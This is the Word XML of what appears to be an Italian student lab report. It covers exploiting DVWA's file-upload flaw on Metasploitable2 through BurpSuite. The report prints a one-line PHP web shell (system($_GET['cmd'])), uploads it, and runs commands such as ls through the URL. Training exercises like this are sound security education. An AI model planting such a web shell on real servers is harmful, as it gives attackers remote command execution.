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5BBC" w14:textId="77777777" w:rsidR="00A35003" w:rsidRDefault="00A35003" w:rsidP="00A35003">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D28BACF" w14:textId="77777777" w:rsidR="00A35003" w:rsidRDefault="00A35003" w:rsidP="00A35003"/>
    <w:p w14:paraId="50E71708" w14:textId="2C1526F2" w:rsidR="00283185" w:rsidRDefault="00A35003" w:rsidP="00A35003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A35003">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Lo scopo dell’esercizio è sfruttare la vulnerabilità di </w:t>
      </w:r>
      <w:r w:rsidRPr="00A35003">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">un </w:t>
      </w:r>
      <w:r w:rsidRPr="00A35003">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:r w:rsidRPr="00A35003">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> in</w:t>
      </w:r>
      <w:r w:rsidRPr="00A35003">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> upload presente su DVWA per prendere controllo della macchina ed eseguire dei comandi da remoto tramite una shell in PHP. Intercetta</w:t>
      </w:r>
      <w:r w:rsidRPr="00A35003">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>ndo</w:t>
      </w:r>
      <w:r w:rsidRPr="00A35003">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> ogni richiesta verso la DVWA con BurpSuite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12761D26" w14:textId="2BCC3065" w:rsidR="00A35003" w:rsidRPr="00A35003" w:rsidRDefault="00A35003" w:rsidP="00A35003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</w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dopo le varie configurazioni di DVWA su Metasploitable2 diminuendo la sicurezza a “low” creiamo un file.php con all’interno un semplice comando in grado di modificare le richieste GET: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A35003">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;?php</w:t>
      </w:r>
      <w:r w:rsidRPr="00A35003">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A35003">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>system($_GET[‘cmd’]);</w:t>
      </w:r>
      <w:r w:rsidRPr="00A35003">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A35003">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F507C25" w14:textId="5848EA4F" w:rsidR="00A35003" w:rsidRPr="00A35003" w:rsidRDefault="00A35003" w:rsidP="00A35003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E04C89A" w14:textId="1C2F9F9C" w:rsidR="00A35003" w:rsidRDefault="00A35003" w:rsidP="00A350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ABE7A4" wp14:editId="5B8BB563">
            <wp:extent cx="6119495" cy="3815715"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15651234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2028" w14:textId="62F2C41E" w:rsidR="00A35003" w:rsidRPr="005543AD" w:rsidRDefault="00A35003" w:rsidP="00A35003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A35003">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Una volta</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005543AD">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">aggiunto il file php carichiamo nella Url di DVWA la richiesta </w:t>
      </w:r>
      <w:r w:rsidR="005543AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/hackable/uploads/shell.php  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106C9C07" w14:textId="4A2447DB" w:rsidR="00A35003" w:rsidRDefault="00A35003" w:rsidP="00A350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D204C6" wp14:editId="6BFC53B5">
            <wp:extent cx="6119495" cy="923290"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="61716814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949F" w14:textId="0DBF9543" w:rsidR="005543AD" w:rsidRPr="005543AD" w:rsidRDefault="005543AD" w:rsidP="00A35003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005543AD">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Da questo momento potremmo muoverci nel sito con i comandi del prompt come ad esempio </w:t>
      </w:r>
      <w:r w:rsidRPr="005543AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>…?cmd=ls</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="005543AD" w:rsidRPr="005543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DE"/>
    <w:rsid w:val="00283185"/>
    <w:rsid w:val="005543AD"/>
    <w:rsid w:val="006A50DE"/>
    <w:rsid w:val="00A3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6D7B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D560BEF0-3383-40B8-852B-73E44682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w-post-body-paragraph">
    <w:name w:val="pw-post-body-paragraph"/>
    <w:basedOn w:val="Normale"/>
    <w:rsid w:val="00A3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3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-10-30T13:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-30T13:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>